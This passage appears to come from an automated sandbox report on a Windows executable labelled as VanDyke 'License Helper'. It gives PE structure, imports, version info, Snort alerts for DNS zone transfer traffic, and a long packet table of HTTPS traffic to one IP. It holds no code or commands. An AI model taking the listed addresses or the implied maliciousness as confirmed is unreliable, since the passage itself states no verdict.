IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6ba7	0x7000	False	0.592808314732	data	6.44090698985	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1186	0x2000	False	0.27001953125	data	3.62785728692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x365c	0x3000	False	0.0802408854167	data	0.841200769543	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x1000	0x1000	False	0.111083984375	data	1.09363315293	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xe058	0x37c	data	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, LoadLibraryA, lstrlenW, InterlockedDecrement, CloseHandle, WriteFile, CreateFileW, lstrcatW, GetModuleFileNameW, RaiseException, LocalFree, lstrlenA, InterlockedIncrement, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, MultiByteToWideChar, RtlUnwind, GetCommandLineA, GetVersion, ExitProcess, HeapFree, HeapAlloc, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError, TlsGetValue, GetLastError, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleHandleA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, IsBadWritePtr, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetCPInfo, GetACP, GetOEMCP, HeapSize
USER32.dll	wsprintfW
ole32.dll	CoInitializeSecurity, CoUninitialize, CoInitialize, CoCreateInstance, CoSetProxyBlanket
OLEAUT32.dll	VariantInit, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayAccessData, SafeArrayUnaccessData, SysStringLen, SysAllocStringLen, SysAllocString, VariantClear, SysFreeString, GetErrorInfo

Version Infos

Description	Data
LegalCopyright	Copyright (C) 1995-2018 VanDyke Software, Inc.
InternalName	License Helper
FileVersion	8.5.0.1740
CompanyName	VanDyke Software, Inc.
Comments	\$Revision: 122570 \$
ProductName	License Helper
ProductVersion	8.5.0.1740
FileDescription	License Helper
OriginalFilename	LicenseHelper.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-23:30:25.906443	UDP	1948	DNS zone transfer UDP	61523	53	192.168.2.4	34.97.69.225
08/03/21-23:30:32.336214	UDP	1948	DNS zone transfer UDP	61523	53	192.168.2.4	34.97.69.225
08/03/21-23:30:45.138738	UDP	1948	DNS zone transfer UDP	61523	53	192.168.2.4	34.97.69.225
08/03/21-23:30:52.389943	UDP	1948	DNS zone transfer UDP	61523	53	192.168.2.4	34.97.69.225
08/03/21-23:30:58.627455	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	34.97.69.225
08/03/21-23:30:59.347406	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	34.97.69.225
08/03/21-23:31:00.428363	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	34.97.69.225
08/03/21-23:31:02.050949	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	34.97.69.225
08/03/21-23:31:03.007850	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	34.97.69.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:30:05.307374001 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.324290037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.324474096 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.328849077 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.345643997 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.349910975 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.349936008 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.349947929 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.350028992 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.357999086 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.374893904 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.376185894 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.426561117 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.440557003 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.457418919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.991862059 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.991976023 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992001057 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992023945 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992038965 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992060900 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992082119 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992108107 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992130995 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.992340088 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:05.993311882 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.993371964 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.993395090 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.993412971 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.993432999 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:05.993781090 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.248852968 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.248888969 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.248912096 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.248923063 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.248992920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249017954 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249033928 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249066114 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.249093056 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.249475956 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249505997 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249528885 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249551058 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.249566078 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.249712944 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.250284910 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.250382900 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.250983953 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251009941 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251044035 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251059055 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251091003 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.251127958 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.251254082 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251276970 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251291037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251358986 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.251729965 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251754999 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251775026 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251796007 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.251820087 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.251868963 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.252494097 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252566099 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252583027 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252636909 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.252655983 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.252774000 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252796888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252819061 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252834082 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.252882957 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.252896070 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.253429890 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.301661968 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.504026890 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504053116 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504065037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504071951 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504200935 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.504245043 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504261971 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504272938 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504334927 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.504657984 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504673958 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504744053 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.504981995 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.504996061 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505039930 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.505115032 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505132914 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505148888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505165100 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.505214930 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505250931 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.505769014 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505808115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505825043 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505839109 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505851030 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.505958080 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.505976915 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.506405115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.506424904 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.506483078 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.509176970 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509201050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509213924 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509226084 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509283066 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.509325027 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.509439945 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509457111 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509478092 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509491920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.509520054 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.509553909 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.510086060 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510104895 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510118008 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510133028 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510180950 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.510200977 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.510855913 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510873079 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510894060 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510907888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.510961056 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.511012077 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.511558056 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.511579990 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.511595011 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.511614084 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.511650085 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.511682034 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.761981964 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762065887 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762124062 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762166977 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762216091 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762233973 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762268066 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762319088 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762331009 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762358904 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762361050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762413025 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762439013 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762573004 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762631893 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762650013 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762675047 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762729883 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.762830019 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762921095 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.762976885 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.763185978 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763259888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763367891 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.763540983 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763602972 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763659954 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763670921 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.763714075 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763753891 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.763770103 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.764065027 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.764111042 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.764146090 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.765495062 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765567064 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765604973 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.765615940 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765657902 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765671968 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.765710115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765754938 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765763998 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.765811920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765858889 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765867949 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.765911102 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765950918 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.765966892 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.766002893 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.766041994 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.766052961 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.767071009 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767174006 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767180920 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.767230034 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767270088 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767283916 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.767321110 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767373085 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767376900 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:06.767411947 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:06.767462969 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.017065048 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017179012 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017220020 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017257929 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.017263889 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017299891 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017328978 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.017343044 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017389059 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017389059 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.017416000 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.017457008 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.020118952 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020149946 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020162106 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020172119 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020304918 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.020348072 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020384073 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020407915 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020431042 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020456076 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.020602942 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.021250010 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.021277905 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.021301985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.021313906 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.021320105 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.021341085 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.021357059 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.021408081 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.023550034 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023606062 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023647070 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023684978 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023714066 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.023719072 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023751020 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.023761034 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023804903 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.023807049 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023833990 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023870945 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.023870945 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.024781942 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.024804115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.024818897 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.024852037 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.024871111 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.024924040 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.024946928 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.025017977 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.025801897 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.025835037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.025854111 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.025892019 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.067409039 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.276407957 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276457071 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276477098 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276490927 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276576996 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276604891 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276628971 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276650906 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276674032 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.276727915 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.276787996 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.277600050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.277628899 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.277643919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.277663946 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.277678013 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.277833939 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.278657913 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.278702974 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.278732061 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.278861046 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.284703970 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.284732103 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.284744978 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.284759998 CEST	443	49739	172.67.146.70	192.168.2.4
